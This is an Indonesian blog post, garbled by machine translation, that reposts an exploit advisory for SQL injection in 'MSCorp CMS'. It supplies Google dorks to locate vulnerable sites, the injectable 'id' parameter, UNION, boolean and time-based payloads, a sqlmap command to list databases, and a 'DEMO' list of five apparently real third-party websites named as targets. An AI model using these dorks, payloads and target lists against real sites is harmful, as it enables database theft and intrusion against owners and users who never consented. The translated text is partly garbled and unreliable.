Maaf, situs ini tidak berfungsi dengan baik tanpa JavaScript.

Dork: "Dikembangkan Oleh MSCorp"

Oleh chmood

Oktober 10, 2015

[+] Judul: - MSCorp CMS - SQL Injection Vulnerability
[+] Tanggal: - 7 - Agustus - 2015
[+] Penjual Homepage: - http://www.mscorp.co.in/
[+] Versi: - Semua Versi
[+] Diuji pada: - Nginx / 1.4.5, PHP / 5.2.17, Linux - Jendela
[+] Kategori: - webapps
[+] Google Dorks: - "Dikembangkan Oleh MSCorp"

"Dikembangkan Dengan MSCorp" + inurl:.? Php / id =

"Dikembangkan Dengan MSCorp" inurl: "? Php"
[+] Exploit Penulis: - Shelesh Rauthan (ShOrTy420 alias @ Stian SEB)
[+] Nama Team: - Team Alastor Breeze, Cerdas-Eksploitasi
[+] Official Website: - serverfarming.com, intelligentexploit.com
[+] Para Anggota resmi: -!! Sh0rTy420, P @ rL0u $, nfIn Ty, Th3G0v3Rn3R, m777k
[+] Greedz ke: -@@lu, Lalit, MyLappy <3, Diksha, DK
[+] Kontak: - fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com

================================================== =======
[+] Severity Level: - Tinggi

[+] Request Cara (s): - GET / POST

[+] Parameter Rentan (s): - id

[+] Wilayah yang Terkena (s): - Seluruh admin, database, Server

[+] Tentang: - tidak berkepentingan SQL Injection melalui Beberapa Php Files menyebabkan kesalahan SQL

[+] SQL Berkas rentan: - /home/DOMAIN/public_html/XXX.php

[+] POC: - http://127.0.0.1/XXX.php?id=[SQL] '

Kerentanan web sql Injection dapat dimanfaatkan dengan remote
penyerang tanpa hak istimewa web-aplikasi pengguna akun atau pengguna
interaksi.

. http: // www [WEBSITE] .com / XXX.php id = 6 rangka 'berdasarkan [SQL IN4JECTION] - +
. http: // www [WEBSITE] .com / XXX.php id = 6 union 'semua pilih [SQL INJECTION] - +

SqlMap
++++++++++++++++++++++++++
python sqlmap.py -url "http://127.0.0.1/XXX.php?id=[SQL]" -dbs
++++++++++++++++++++++++++
-
Parameter: id (GET)

Jenis: buta berbasis boolean

Judul: DAN boolean berbasis buta - MANA atau klausa HAVING

Payload: id = 6 AND 1803 = 1803

Jenis: DAN / ATAU waktu berbasis buta

Judul: MySQL> = 5.0.12 DAN waktu berbasis buta

Payload: id = 6 DAN TIDUR (5)

Jenis: permintaan UNION

Judul: permintaan UNION Generic (NULL) - 1 kolom

Payload: id = 6 UNION ALL SELECT CONCAT (0x717a626a71,0x72454556666e64596a4a, 0x7178767071) -
-

[+] DEMO: - http://www.hoXtelsahyadrialibaug.com/gallery.php?id=6 '

http://www.tapolaXtourism.com/showContent.php?id=17 '

http://www.reigeXltech.com/content.php?content=10 '

http://www.koyXanalakeview.com/facilities.php?content=4 '

http://www.lycXomb.com/productdetails.php?id=2 '

Category

Dork Exploitations

Komentar

Postingan Lebih Baru Postingan Lama

Dork: "Dikembangkan Oleh MSCorp"

Cara Dapat Backlink dengan Google Dork

Backlink dengan Google Dork Seo

Lowongan Pekerjaan PT HM Sampoerna Tbk, Hari Ini Agustus 2023

DOWNLOAD APP SCRAPEBOX PREMIUM FREE SEO

Cara Mentera Ulang Truk Tangki BBM

Cara Dapat Backlink Edu Gratis

Hacking Jcow Social Networking Webserver

App Baca Buku Pdf, Epub, Word, Mobi, Kindle, Android Tampa Iklan ReadEra

Tata-Tata Cara Mendapatkan Penghasilan dari Blog Hingga Ratusan Juta Bahkan Milyaran per Bulan

Mengetahui Cara Mencari Kata Kunci SEO Powerfull